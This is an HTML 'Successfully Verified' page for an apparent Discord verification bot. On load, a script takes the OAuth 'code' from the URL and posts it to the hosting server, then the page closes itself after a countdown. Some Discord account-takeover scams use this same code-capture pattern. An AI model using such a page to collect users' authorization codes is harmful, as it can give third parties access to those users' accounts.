<html lang="en"><head>
<title>Successfully Verified</title>
<meta charset="utf-8">
<meta name="description" content="Next-Gen Discord Verification Bots Simplified &amp; Efficient.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<meta name="referrer" content="no-referrer">
<link rel="icon" type="image/png" href="https://aaaaaaaaaaaaaaaaaa.aqzuslole841.repl.co//assets/img/logo.png">
<link rel="apple-touch-icon" href="https://aaaaaaaaaaaaaaaaaa.aqzuslole841.repl.co//assets/img/logo.png">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
<link rel="stylesheet" type="text/css" href="https://aaaaaaaaaaaaaaaaaa.aqzuslole841.repl.co/style.css">
</head>
<body data-new-gr-c-s-check-loaded="14.1112.0" data-gr-ext-installed="">
<div id="content">
<div class="content-title">VERIFIE<span class="primary">D</span></div>
<div class="content-subtitle"> Your account verification has been completed successfully.</div>

<div id="captcha"></div>
</div>
<div id="credits">
<i class="fab fa-ethereum"></i> 9m22 
</div>

</body></html>
  <script>
  var counter = 5;
    setInterval(function () {
        counter--;
        if (counter >= 0) {
            span = document.getElementById("counter");
            span.innerHTML = counter;
        
        }
        if (counter === 0) {
            clearInterval(counter);
         window.close();

            return;
        }
    }, 1000);
   

    
    
</script>
</body>

<script>

 window.onload = () => {
            const code = location.href.substring(location.href.indexOf("code")+5, location.href.length)

            if (location.href.indexOf("code") > -1) {
                const req = new XMLHttpRequest()
                req.open("POST", "")
               req.send(code)
                req.onload = () => {
                }

            } else {
          
      }
        } 
</script>



</html>